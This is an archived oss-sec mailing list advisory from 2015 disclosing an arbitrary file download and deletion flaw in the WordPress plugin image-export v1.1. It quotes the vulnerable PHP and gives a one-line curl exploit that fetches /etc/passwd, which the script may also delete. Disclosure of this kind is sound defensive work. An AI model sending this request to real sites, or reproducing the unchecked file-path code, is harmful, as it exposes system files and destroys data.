oss-sec mailing list archives
Remote file download vulnerability in Wordpress Plugin image-export v1.1
From: "Larry W. Cashdollar" <larry0 () me com>
Date: Mon, 13 Jul 2015 19:20:50 -0400
Title: Remote file download vulnerability in Wordpress Plugin image-export v1.1 Author: Larry W. Cashdollar, @_larry0 Date: 2015-07-01 Download Site: https://wordpress.org/plugins/image-export Vendor: www.1efthander.com Vendor Notified: 2015-07-05 Vendor Contact: https://twitter.com/1eftHander Description: Image Export plugin can help you selectively download images uploaded by an administrator . Vulnerability: The code in file download.php doesn't do any checking that the user is requesting files from the uploaded images directory only. And line 8 attempts to unlink the file after being downloaded. This script could be used to delete files out of the wordpress directory if file permissions allow. 1 <?php 2 if ( isset( $_REQUEST['file'] ) && !empty( $_REQUEST['file'] ) ) { 3 $file = $_GET['file']; 4 5 header( 'Content-Type: application/zip' ); 6 header( 'Content-Disposition: attachment; filename="' . $file . '"' ); 7 readfile( $file ); 8 unlink( $file ); 9 10 exit; 11 } 12 ?> CVEID: TBD Exploit Code: • $ curl http://example.com/wp-content/plugins/image-export/download.php?file=/etc/passwd Screen Shots: Advisory: http://www.vapid.dhs.org/advisory.php?v=135
Current thread:
- Remote file download vulnerability in Wordpress Plugin image-export v1.1 Larry W. Cashdollar (Jul 13)
- Re: Remote file download vulnerability in Wordpress Plugin image-export v1.1 cve-assign (Jul 20)